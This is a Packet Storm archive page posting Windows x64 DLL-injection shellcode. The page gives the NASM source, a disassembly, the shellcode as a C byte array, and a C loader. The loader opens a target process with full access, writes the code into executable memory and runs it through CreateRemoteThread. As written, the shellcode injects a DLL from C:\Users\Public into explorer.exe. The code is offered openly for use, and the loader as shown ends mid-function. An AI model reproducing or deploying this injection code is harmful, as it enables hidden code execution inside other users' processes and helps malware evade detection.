what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Windows x64 CreateRemoteThread() DLL Injection Shellcode

Windows x64 CreateRemoteThread() DLL Injection Shellcode
Posted Jan 15, 2017
Authored by Roziul Hasan Khan Shifat

584 bytes small Windows x64 CreateRemoteThread() DLL injection shellcode.

tags | shellcode
systems | windows
SHA-256 | a8a59b8091f3030bf184a00592e4b7185739e63499eee6346fec8c4637098469

Windows x64 CreateRemoteThread() DLL Injection Shellcode

Change Mirror Download
/*

Title: Windows x64 dll injection shellcode (using CreateRemoteThread())
Size: 584 bytes
Date: 16-01-2017
Author: Roziul Hasan Khan Shifat
Tested On : Windows 7 x64






*/



//Note : i wrtie it for process injection
//It may work in exploit



/*

section .text
global _start
_start:
xor r8,r8
push r8
push r8

mov [rsp],dword 'expl'
mov [rsp+4],dword 'orer'
mov [rsp+8],dword '.exe'

lea rcx,[rsp] ;;process name (explorer.exe) change it if U want


push r8
push r8
push r8



mov [rsp],dword 'C:\U'
mov [rsp+4],dword 'sers'
mov [rsp+8],dword '\Pub'
mov [rsp+12],dword 'lic\'
mov [rsp+16],dword 'in.d'
mov [rsp+20],word 'll'

lea rdx,[rsp] ;path of the dll (change it to U full path of dll)




;--------------------------------------------------------

mov r8w,336

sub rsp,r8
lea r12,[rsp]

push 24
pop r8 ;(important: length of dll path string including null byte)


mov [r12],rcx ;process name
mov [r12+8],rdx ;dll path
mov [r12+16],r8 ;length of dll path string

;----------------------------------------------------------





_main:

cdq
mov rax,[gs:rdx+0x60] ;peb
mov rax,[rax+0x18] ;peb->Ldr
mov rsi,[rax+0x10] ;peb->Ldr.InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;rdi=kernel32.dll base address



;------------------------------------------
mov dl,0x88
mov ebx,[rdi+0x3c] ;DOS_HEADER->elf_anew
add rbx,rdi ;IMAGE_OPTIONAL_HEADER32
mov ebx,[rbx+rdx] ;IMAGE_DATA_DIRECTORY->VirtualAddress
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY (Export table of kernel32.dll)

mov esi,[rbx+0x1c] ;kenrel32.dll AddressOfFunction
add rsi,rdi

;-------------------------------------------------------
;loading msvcrt.dll
cdq
push rdx
mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,rdi


mov [rsp],dword 'msvc'
mov [rsp+4],word 'rt'

lea rcx,[rsp]

sub rsp,88

call rbx

;-------------------------------
;Finding address of strcmp()

lea rdx,[rsp+88]
mov [rdx],dword 'strc'
mov [rdx+4],word 'mp'

mov rcx,rax

mov r8w,587*4
mov ebx,[rsi+r8]
add rbx,rdi

call rbx
;-----------------------------
mov [r12+24],rax ;address of strcmp()
;---------------------------------------------------------------

mov dx,190*4
mov ebx,[rsi+rdx]
add rbx,rdi ;CreateToolhelp32Snapshot()

;--------------------------------

;HANDLE WINAPI CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID)
xor rdx,rdx ;DWORD th32ProcessID
push 2
pop rcx ;DWORD dwFlags
call rbx

mov r13,rax ;HANDLE
cmp r13,-1
je __exit
;---------------------------------------------
mov dx,304

mov [r12+32],dword edx ;sizeof PROCESSENTRY32



mov dx,920*4
mov ebx,[rsi+rdx]
add rbx,rdi ;rbx=Process32First()

;WINBOOL WINAPI Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);

lea rdx,[r12+32] ;LPPROCESSENTRY32 lppe
mov rcx,r13 ;HANDLE hSnapshot


call rbx

cmp rax,1
jne __exit

;---------------------------------------------------

xor rdx,rdx
mov dx,922*4
mov r15d,[rsi+rdx]
add r15,rdi ;r15=Process32Next()



sub rsp,88
get_pid:
lea rcx,[r12+76] ;PROCESSENRY32.CHAR szExeFile[MAX_PATH=260]
mov rdx,[r12] ;process name
mov rbx,[r12+24] ;strcmp()
call rbx

xor rdx,rdx
cmp rax,rdx
jz inject

;WINBOOL WINAPI Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
mov rcx,r13
lea rdx,[r12+32]
call r15

cmp rax,1
je get_pid

leave
ret










__exit:
xor rdx,rdx
push rdx
mov dx,297*4
mov ebx,[rsi+rdx]
add rbx,rdi

pop rcx
call rbx










;--------------------------------------------------
;------------------------------------------------------
;inject function
inject:

xor rdx,rdx
push rdx
pop r10

mov r10w,899*4
mov ebx,[rsi+r10]
add rbx,rdi ;rbx=OpenProcess()

;WINBASEAPI HANDLE WINAPI OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId)

push rdx
pop rcx

mov r8d,[r12+40] ;PROCESSENTRY32.DWORD th32ProcessID

;0x1e84800a-0x1e65700b=2035711 (PROCESS_ALL_ACCESS)

mov ecx,0x1e84800a
sub ecx,0x1e65700b

call rbx

mov r13,rax ;PROCESS HANDLE
cmp r13,-1
je __exit
;--------------------------------------------------------------------

mov dx,1279
mov ebx,[rsi+rdx*4]
add rbx,rdi ;VirualAlloc()

;WINBASEAPI LPVOID WINAPI VirtualAllocEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
sub rsp,88

mov rcx,r13 ;HANDLE hProcess
xor rdx,rdx ;LPVOID lpAddress
mov r8,[r12+16] ;SIZE_T dwSize
mov r9w,0x2fff
inc r9;DWORD flAllocationType = (MEM_COMMIT | MEM_RESERVE)
mov [rsp+32],byte 0x4 ;DWORD flProtect = PAGE_READWRITE
call rbx

mov r14,rax ;LPVOID address
xor rdx,rdx
cmp rax,rdx
jz __exit


;-----------------------------------------------------------------------------------
mov dx,1347
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WriteProcessMemory()
sub rsp,88
xor rdx,rdx
;WINBASEAPI WINBOOL WINAPI WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
mov [rsp+32],rdx ;SIZE_T *lpNumberOfBytesWritten
mov rcx,r13 ;HANDLE hProcess
mov rdx,r14 ;LPVOID lpBaseAddress
mov r8,[r12+8] ;LPCVOID lpBuffer
mov r9,[r12+16] ;SIZE_T nSize

call rbx



cmp rax,1
jne __exit

;------------------------------------------------------------------------------------
mov dx,170*4
mov ebx,[rsi+rdx]
add rbx,rdi ;CreateRemoteThread()

xor rdx,rdx
sub rsp,88
;WINBASEAPI HANDLE WINAPI CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)

mov rcx,r13 ;HANDLE hProcess
push rdx
push rdx
pop r8 ;SIZE_T dwStackSize

mov dx,832
mov r9d,[rsi+rdx*4]
add r9,rdi ;LPTHREAD_START_ROUTINE lpStartAddress (LoadLibraryA())

pop rdx ;LPSECURITY_ATTRIBUTES lpThreadAttributes
mov [rsp+32],r14 ;LPVOID lpParameter
mov [rsp+40],r8
mov [rsp+48],r8
call rbx

call __exit

;------------------------------------------------------------























*/



/*



dll_inj.obj: file format pe-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
0: 4d 31 c0 xor %r8,%r8
3: 41 50 push %r8
5: 41 50 push %r8
7: c7 04 24 65 78 70 6c movl $0x6c707865,(%rsp)
e: c7 44 24 04 6f 72 65 movl $0x7265726f,0x4(%rsp)
15: 72
16: c7 44 24 08 2e 65 78 movl $0x6578652e,0x8(%rsp)
1d: 65
1e: 48 8d 0c 24 lea (%rsp),%rcx
22: 41 50 push %r8
24: 41 50 push %r8
26: 41 50 push %r8
28: c7 04 24 43 3a 5c 55 movl $0x555c3a43,(%rsp)
2f: c7 44 24 04 73 65 72 movl $0x73726573,0x4(%rsp)
36: 73
37: c7 44 24 08 5c 50 75 movl $0x6275505c,0x8(%rsp)
3e: 62
3f: c7 44 24 0c 6c 69 63 movl $0x5c63696c,0xc(%rsp)
46: 5c
47: c7 44 24 10 69 6e 2e movl $0x642e6e69,0x10(%rsp)
4e: 64
4f: 66 c7 44 24 14 6c 6c movw $0x6c6c,0x14(%rsp)
56: 48 8d 14 24 lea (%rsp),%rdx
5a: 66 41 b8 50 01 mov $0x150,%r8w
5f: 4c 29 c4 sub %r8,%rsp
62: 4c 8d 24 24 lea (%rsp),%r12
66: 6a 18 pushq $0x18
68: 41 58 pop %r8
6a: 49 89 0c 24 mov %rcx,(%r12)
6e: 49 89 54 24 08 mov %rdx,0x8(%r12)
73: 4d 89 44 24 10 mov %r8,0x10(%r12)

0000000000000078 <_main>:
78: 99 cltd
79: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
7e: 48 8b 40 18 mov 0x18(%rax),%rax
82: 48 8b 70 10 mov 0x10(%rax),%rsi
86: 48 ad lods %ds:(%rsi),%rax
88: 48 8b 30 mov (%rax),%rsi
8b: 48 8b 7e 30 mov 0x30(%rsi),%rdi
8f: b2 88 mov $0x88,%dl
91: 8b 5f 3c mov 0x3c(%rdi),%ebx
94: 48 01 fb add %rdi,%rbx
97: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
9a: 48 01 fb add %rdi,%rbx
9d: 8b 73 1c mov 0x1c(%rbx),%esi
a0: 48 01 fe add %rdi,%rsi
a3: 99 cltd
a4: 52 push %rdx
a5: 66 ba 40 03 mov $0x340,%dx
a9: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
ac: 48 01 fb add %rdi,%rbx
af: c7 04 24 6d 73 76 63 movl $0x6376736d,(%rsp)
b6: 66 c7 44 24 04 72 74 movw $0x7472,0x4(%rsp)
bd: 48 8d 0c 24 lea (%rsp),%rcx
c1: 48 83 ec 58 sub $0x58,%rsp
c5: ff d3 callq *%rbx
c7: 48 8d 54 24 58 lea 0x58(%rsp),%rdx
cc: c7 02 73 74 72 63 movl $0x63727473,(%rdx)
d2: 66 c7 42 04 6d 70 movw $0x706d,0x4(%rdx)
d8: 48 89 c1 mov %rax,%rcx
db: 66 41 b8 2c 09 mov $0x92c,%r8w
e0: 42 8b 1c 06 mov (%rsi,%r8,1),%ebx
e4: 48 01 fb add %rdi,%rbx
e7: ff d3 callq *%rbx
e9: 49 89 44 24 18 mov %rax,0x18(%r12)
ee: 66 ba f8 02 mov $0x2f8,%dx
f2: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
f5: 48 01 fb add %rdi,%rbx
f8: 48 31 d2 xor %rdx,%rdx
fb: 6a 02 pushq $0x2
fd: 59 pop %rcx
fe: ff d3 callq *%rbx
100: 49 89 c5 mov %rax,%r13
103: 49 83 fd ff cmp $0xffffffffffffffff,%r13
107: 74 60 je 169 <__exit>
109: 66 ba 30 01 mov $0x130,%dx
10d: 41 89 54 24 20 mov %edx,0x20(%r12)
112: 66 ba 60 0e mov $0xe60,%dx
116: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
119: 48 01 fb add %rdi,%rbx
11c: 49 8d 54 24 20 lea 0x20(%r12),%rdx
121: 4c 89 e9 mov %r13,%rcx
124: ff d3 callq *%rbx
126: 48 83 f8 01 cmp $0x1,%rax
12a: 75 3d jne 169 <__exit>
12c: 48 31 d2 xor %rdx,%rdx
12f: 66 ba 68 0e mov $0xe68,%dx
133: 44 8b 3c 16 mov (%rsi,%rdx,1),%r15d
137: 49 01 ff add %rdi,%r15
13a: 48 83 ec 58 sub $0x58,%rsp

000000000000013e <get_pid>:
13e: 49 8d 4c 24 4c lea 0x4c(%r12),%rcx
143: 49 8b 14 24 mov (%r12),%rdx
147: 49 8b 5c 24 18 mov 0x18(%r12),%rbx
14c: ff d3 callq *%rbx
14e: 48 31 d2 xor %rdx,%rdx
151: 48 39 d0 cmp %rdx,%rax
154: 74 24 je 17a <inject>
156: 4c 89 e9 mov %r13,%rcx
159: 49 8d 54 24 20 lea 0x20(%r12),%rdx
15e: 41 ff d7 callq *%r15
161: 48 83 f8 01 cmp $0x1,%rax
165: 74 d7 je 13e <get_pid>
167: c9 leaveq
168: c3 retq

0000000000000169 <__exit>:
169: 48 31 d2 xor %rdx,%rdx
16c: 52 push %rdx
16d: 66 ba a4 04 mov $0x4a4,%dx
171: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
174: 48 01 fb add %rdi,%rbx
177: 59 pop %rcx
178: ff d3 callq *%rbx

000000000000017a <inject>:
17a: 48 31 d2 xor %rdx,%rdx
17d: 52 push %rdx
17e: 41 5a pop %r10
180: 66 41 ba 0c 0e mov $0xe0c,%r10w
185: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
189: 48 01 fb add %rdi,%rbx
18c: 52 push %rdx
18d: 59 pop %rcx
18e: 45 8b 44 24 28 mov 0x28(%r12),%r8d
193: b9 0a 80 84 1e mov $0x1e84800a,%ecx
198: 81 e9 0b 70 65 1e sub $0x1e65700b,%ecx
19e: ff d3 callq *%rbx
1a0: 49 89 c5 mov %rax,%r13
1a3: 49 83 fd ff cmp $0xffffffffffffffff,%r13
1a7: 74 c0 je 169 <__exit>
1a9: 66 ba ff 04 mov $0x4ff,%dx
1ad: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
1b0: 48 01 fb add %rdi,%rbx
1b3: 48 83 ec 58 sub $0x58,%rsp
1b7: 4c 89 e9 mov %r13,%rcx
1ba: 48 31 d2 xor %rdx,%rdx
1bd: 4d 8b 44 24 10 mov 0x10(%r12),%r8
1c2: 66 41 b9 ff 2f mov $0x2fff,%r9w
1c7: 49 ff c1 inc %r9
1ca: c6 44 24 20 04 movb $0x4,0x20(%rsp)
1cf: ff d3 callq *%rbx
1d1: 49 89 c6 mov %rax,%r14
1d4: 48 31 d2 xor %rdx,%rdx
1d7: 48 39 d0 cmp %rdx,%rax
1da: 74 8d je 169 <__exit>
1dc: 66 ba 43 05 mov $0x543,%dx
1e0: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
1e3: 48 01 fb add %rdi,%rbx
1e6: 48 83 ec 58 sub $0x58,%rsp
1ea: 48 31 d2 xor %rdx,%rdx
1ed: 48 89 54 24 20 mov %rdx,0x20(%rsp)
1f2: 4c 89 e9 mov %r13,%rcx
1f5: 4c 89 f2 mov %r14,%rdx
1f8: 4d 8b 44 24 08 mov 0x8(%r12),%r8
1fd: 4d 8b 4c 24 10 mov 0x10(%r12),%r9
202: ff d3 callq *%rbx
204: 48 83 f8 01 cmp $0x1,%rax
208: 0f 85 5b ff ff ff jne 169 <__exit>
20e: 66 ba a8 02 mov $0x2a8,%dx
212: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
215: 48 01 fb add %rdi,%rbx
218: 48 31 d2 xor %rdx,%rdx
21b: 48 83 ec 58 sub $0x58,%rsp
21f: 4c 89 e9 mov %r13,%rcx
222: 52 push %rdx
223: 52 push %rdx
224: 41 58 pop %r8
226: 66 ba 40 03 mov $0x340,%dx
22a: 44 8b 0c 96 mov (%rsi,%rdx,4),%r9d
22e: 49 01 f9 add %rdi,%r9
231: 5a pop %rdx
232: 4c 89 74 24 20 mov %r14,0x20(%rsp)
237: 4c 89 44 24 28 mov %r8,0x28(%rsp)
23c: 4c 89 44 24 30 mov %r8,0x30(%rsp)
241: ff d3 callq *%rbx
243: e8 21 ff ff ff callq 169 <__exit>

















*/
























#include<stdio.h>
#include<windows.h>
#include<TlHelp32.h>
#include<string.h>


char shellcode[]="\x4d\x31\xc0\x41\x50\x41\x50\xc7\x04\x24\x65\x78\x70\x6c\xc7\x44\x24\x04\x6f\x72\x65\x72\xc7\x44\x24\x08\x2e\x65\x78\x65\x48\x8d\x0c\x24\x41\x50\x41\x50\x41\x50\xc7\x04\x24\x43\x3a\x5c\x55\xc7\x44\x24\x04\x73\x65\x72\x73\xc7\x44\x24\x08\x5c\x50\x75\x62\xc7\x44\x24\x0c\x6c\x69\x63\x5c\xc7\x44\x24\x10\x69\x6e\x2e\x64\x66\xc7\x44\x24\x14\x6c\x6c\x48\x8d\x14\x24\x66\x41\xb8\x50\x01\x4c\x29\xc4\x4c\x8d\x24\x24\x6a\x18\x41\x58\x49\x89\x0c\x24\x49\x89\x54\x24\x08\x4d\x89\x44\x24\x10\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x52\x66\xba\x40\x03\x8b\x1c\x96\x48\x01\xfb\xc7\x04\x24\x6d\x73\x76\x63\x66\xc7\x44\x24\x04\x72\x74\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x48\x8d\x54\x24\x58\xc7\x02\x73\x74\x72\x63\x66\xc7\x42\x04\x6d\x70\x48\x89\xc1\x66\x41\xb8\x2c\x09\x42\x8b\x1c\x06\x48\x01\xfb\xff\xd3\x49\x89\x44\x24\x18\x66\xba\xf8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x6a\x02\x59\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\x60\x66\xba\x30\x01\x41\x89\x54\x24\x20\x66\xba\x60\x0e\x8b\x1c\x16\x48\x01\xfb\x49\x8d\x54\x24\x20\x4c\x89\xe9\xff\xd3\x48\x83\xf8\x01\x75\x3d\x48\x31\xd2\x66\xba\x68\x0e\x44\x8b\x3c\x16\x49\x01\xff\x48\x83\xec\x58\x49\x8d\x4c\x24\x4c\x49\x8b\x14\x24\x49\x8b\x5c\x24\x18\xff\xd3\x48\x31\xd2\x48\x39\xd0\x74\x24\x4c\x89\xe9\x49\x8d\x54\x24\x20\x41\xff\xd7\x48\x83\xf8\x01\x74\xd7\xc9\xc3\x48\x31\xd2\x52\x66\xba\xa4\x04\x8b\x1c\x16\x48\x01\xfb\x59\xff\xd3\x48\x31\xd2\x52\x41\x5a\x66\x41\xba\x0c\x0e\x42\x8b\x1c\x16\x48\x01\xfb\x52\x59\x45\x8b\x44\x24\x28\xb9\x0a\x80\x84\x1e\x81\xe9\x0b\x70\x65\x1e\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\xc0\x66\xba\xff\x04\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x4c\x89\xe9\x48\x31\xd2\x4d\x8b\x44\x24\x10\x66\x41\xb9\xff\x2f\x49\xff\xc1\xc6\x44\x24\x20\x04\xff\xd3\x49\x89\xc6\x48\x31\xd2\x48\x39\xd0\x74\x8d\x66\xba\x43\x05\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x48\x31\xd2\x48\x89\x54\x24\x20\x4c\x89\xe9\x4c\x89\xf2\x4d\x8b\x44\x24\x08\x4d\x8b\x4c\x24\x10\xff\xd3\x48\x83\xf8\x01\x0f\x85\x5b\xff\xff\xff\x66\xba\xa8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x48\x83\xec\x58\x4c\x89\xe9\x52\x52\x41\x58\x66\xba\x40\x03\x44\x8b\x0c\x96\x49\x01\xf9\x5a\x4c\x89\x74\x24\x20\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\xff\xd3\xe8\x21\xff\xff\xff";


void inject(DWORD );
int main(int i,char *a[])
{
if(i!=2)
{
printf("Usage %s <program name>",a[0]);
return 0;
}

BOOL f=0;
HANDLE snap;
PROCESSENTRY32 pe32;

snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

if(snap==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot() Failed."); return 0;
}

pe32.dwSize=sizeof(pe32);

if(!Process32First(snap,&pe32))
{
printf("Process32First() Failed."); return 0;
}



do
{
if(0==strncmp(a[1],pe32.szExeFile,strlen(pe32.szExeFile)))
{
f=TRUE;
break;
}

}while(Process32Next(snap,&pe32));


if(!f)
{
printf("No infomation found about \"%s\" ",a[1]);
}
else
{
printf("Program name:%s\nProcess id: %d",pe32.szExeFile,pe32.th32ProcessID);
printf("\nInjecting shellcode");
inject(pe32.th32ProcessID);
}



return 0;

}



void inject(DWORD pid)
{
HANDLE phd,h;
LPVOID shell;

phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);

if(phd==INVALID_HANDLE_VALUE)
{
printf("\nOpenProcess() Failed."); return ;
}

shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(shell==NULL)
{
printf("\nVirtualAllocEx() Failed"); return ; CloseHandle(phd);
}

WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);
printf("\nInjection successfull\n");
printf("Running Shellcode......\n");

h=CreateRemoteThread(phd,NULL,2046,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
if(h==NULL)
{
printf("Failed to Run Shellcode\n"); return ;
}

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close